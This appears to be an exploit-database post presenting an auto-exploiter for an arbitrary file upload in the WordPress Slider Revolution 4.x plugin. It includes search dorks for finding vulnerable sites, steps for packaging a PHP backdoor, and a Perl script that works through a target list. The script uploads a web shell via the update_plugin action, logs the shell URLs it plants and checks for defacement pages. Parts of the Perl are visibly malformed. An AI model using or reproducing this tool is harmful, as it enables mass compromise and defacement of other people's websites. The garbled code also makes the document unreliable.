================================================================================================= | # Title : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://www.sliderrevolution.com/ | | # Dork : index off revslider\backup | plugins/revslider/public/assets/css/settings.css | revslider.php "index of" | wp-content/plugins/revslider/ 2013 | ================================================================================================= [+] poc : [+] Web shell upload : The following perl exploit will attempt to upload backdoor through the update_plugin function To use the exploit, be sure to compress the backdoor file with name [revslider.zip] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension Because the exploit uploads a compressed file to the target [+] simple backdoor : [+] create a text file with name list.txt to save in it your targets [+] The exploit and the backdoor must be in the same folder and path [+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine [+] Perl exploit : #!/usr/bin/perl use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); head(); my $usage = " \nperl $0 \n perl $0 list.txt"; die "$usage" unless $ARGV[0]; open(tarrget,"<$ARGV[0]") or die "$!"; while(){ chomp($_); $target = $_; my $path = "wp-admin/admin-ajax.php"; print "\nTarget => $target\n"; my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"); my $req = $ua->get("$target/$path"); if($req->is_success) { print "\n [+] Xploit Possibility Work :3\n \n"; print " [*] Try Exploiting Vulnerability\n"; print " [*] Xploiting $target\n"; my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]); print " [*] Sent payload\n"; if ($exploit->decoded_content =~ /Wrong update extracted folder/) { print " [+] Payload successfully executed\n"; print " [*] Checking if shell was uploaded\n"; my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content; if($check =~/
/) { print " [+] Shell successfully uploaded\n"; open(save, '>>Shell.txt'); print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n"; close(save); print " [*] Checking if Deface was uploaded now\n"; my $def = $ua->get("$target/leet.html")->content; if($def = ~/Hacked/) { print " [+] Deface uploaded successfull\n"; } else {print " [-] Deface not Uploaded :/"; } } else { print " [-] I'think Shell Not Uploaded :/\n"; } } else { print " [-] Payload failed: Fail\n"; print "\n"; } } else { print "\n [-]Xploit Fail \n"} sub head { print "\t +===============================================\n"; print "\t | Auto Exploiter Revslider Shell Upload \n"; print "\t | Edited: indoushka\n"; print "\t +===============================================\n"; } } Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | | =======================================================================================================================================